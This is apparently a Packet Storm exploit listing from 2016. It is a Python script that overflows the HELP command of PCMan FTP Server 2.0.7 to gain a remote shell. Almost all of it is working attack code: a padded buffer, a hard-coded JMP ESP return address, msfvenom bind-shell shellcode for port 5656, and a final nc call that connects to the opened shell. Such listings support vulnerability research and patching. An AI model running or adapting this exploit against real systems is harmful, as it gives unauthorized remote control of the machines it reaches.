PCMan FTP Server 2.0.7 HELP Buffer Overflow

2016-11-09T00:00:00
ID PACKETSTORM:139656
Type packetstorm
Reporter Yunus YILDIRIM
Modified 2016-11-09T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
#-*- coding: utf-8 -*-  
  
# Exploit Title: PCMan FTP Server 2.0.7 - 'HELP' Command Buffer Overflow   
# Date: 07/11/2016  
# Author: Yunus YILDIRIM (Th3GundY)  
# Team: CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com  
# Website: http://yildirimyunus.com  
# Contact: yunusyildirim@protonmail.com  
# Tested on: Windows 7 Ultimate 32Bit  
  
import socket  
import sys  
import os  
import time  
  
def banner():  
banner = "\n\n"  
banner +=" aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa aaaaaaa \n"  
banner +=" aaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa \n"  
banner +=" aaa aaaaaaaaa aaaaa aaaaaa aaaaaaaaaaaaaaaaa \n"  
banner +=" aaa aaaaaaaaaaaaaa aaaaaa aaaaaaaaaaaaaaaaa \n"  
banner +=" aaaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa \n"  
banner +=" aaaaaaa aaa aaaaaaaaaaaaaaaaaaa aaa aaaaaaa \n"  
banner +=" \n"   
print banner  
  
def exploit(target, port):  
  
eip = "\xC3\x9C\xB4\x76" #SHELL32.dll 76B49CC3 JMP ESP  
  
# msfvenom -p windows/shell_bind_tcp LPORT=5656 -b '\x00\x0a\x0d\xff' -f c  
shellcode = ("\xdb\xcf\xd9\x74\x24\xf4\xba\x9f\xef\x1b\x27\x5e\x29\xc9\xb1"  
"\x53\x31\x56\x17\x03\x56\x17\x83\x59\xeb\xf9\xd2\x99\x1c\x7f"  
"\x1c\x61\xdd\xe0\x94\x84\xec\x20\xc2\xcd\x5f\x91\x80\x83\x53"  
"\x5a\xc4\x37\xe7\x2e\xc1\x38\x40\x84\x37\x77\x51\xb5\x04\x16"  
"\xd1\xc4\x58\xf8\xe8\x06\xad\xf9\x2d\x7a\x5c\xab\xe6\xf0\xf3"  
"\x5b\x82\x4d\xc8\xd0\xd8\x40\x48\x05\xa8\x63\x79\x98\xa2\x3d"  
"\x59\x1b\x66\x36\xd0\x03\x6b\x73\xaa\xb8\x5f\x0f\x2d\x68\xae"  
"\xf0\x82\x55\x1e\x03\xda\x92\x99\xfc\xa9\xea\xd9\x81\xa9\x29"  
"\xa3\x5d\x3f\xa9\x03\x15\xe7\x15\xb5\xfa\x7e\xde\xb9\xb7\xf5"  
"\xb8\xdd\x46\xd9\xb3\xda\xc3\xdc\x13\x6b\x97\xfa\xb7\x37\x43"  
"\x62\xee\x9d\x22\x9b\xf0\x7d\x9a\x39\x7b\x93\xcf\x33\x26\xfc"  
"\x3c\x7e\xd8\xfc\x2a\x09\xab\xce\xf5\xa1\x23\x63\x7d\x6c\xb4"  
"\x84\x54\xc8\x2a\x7b\x57\x29\x63\xb8\x03\x79\x1b\x69\x2c\x12"  
"\xdb\x96\xf9\x8f\xd3\x31\x52\xb2\x1e\x81\x02\x72\xb0\x6a\x49"  
"\x7d\xef\x8b\x72\x57\x98\x24\x8f\x58\xb0\xac\x06\xbe\xd6\xdc"  
"\x4e\x68\x4e\x1f\xb5\xa1\xe9\x60\x9f\x99\x9d\x29\xc9\x1e\xa2"  
"\xa9\xdf\x08\x34\x22\x0c\x8d\x25\x35\x19\xa5\x32\xa2\xd7\x24"  
"\x71\x52\xe7\x6c\xe1\xf7\x7a\xeb\xf1\x7e\x67\xa4\xa6\xd7\x59"  
"\xbd\x22\xca\xc0\x17\x50\x17\x94\x50\xd0\xcc\x65\x5e\xd9\x81"  
"\xd2\x44\xc9\x5f\xda\xc0\xbd\x0f\x8d\x9e\x6b\xf6\x67\x51\xc5"  
"\xa0\xd4\x3b\x81\x35\x17\xfc\xd7\x39\x72\x8a\x37\x8b\x2b\xcb"  
"\x48\x24\xbc\xdb\x31\x58\x5c\x23\xe8\xd8\x6c\x6e\xb0\x49\xe5"  
"\x37\x21\xc8\x68\xc8\x9c\x0f\x95\x4b\x14\xf0\x62\x53\x5d\xf5"  
"\x2f\xd3\x8e\x87\x20\xb6\xb0\x34\x40\x93")  
  
buffer = 'A'*2006 + eip + "\x90"*21 + shellcode  
  
try:  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((target,port))  
s.recv(1024)  
print "[+] Connect to %s on port %d" % (target,port)  
except Exception, e:  
print "[-] Could not create socket", e.message  
sys.exit(0)  
  
try:   
s.send('USER anonymous\r\n')  
s.recv(1024)  
s.send('PASS CT-Zer0\r\n')  
s.recv(1024)  
s.send('HELP ' + buffer + '\r\n')  
print "[+] Exploit Sent Successfully"  
s.close()  
print '[+] You got bind shell on port 5656\n'  
time.sleep(2)  
os.system('nc ' + target + ' 5656')  
except:  
print "[-] Could not connect to target"  
  
  
if len(sys.argv) == 3:  
banner()  
target = sys.argv[1]  
port = int(sys.argv[2])  
exploit(target, port)  
else:  
banner()  
print "[*] Usage: python %s <IP> <Port>\n" % sys.argv[0]  
sys.exit(0)  
`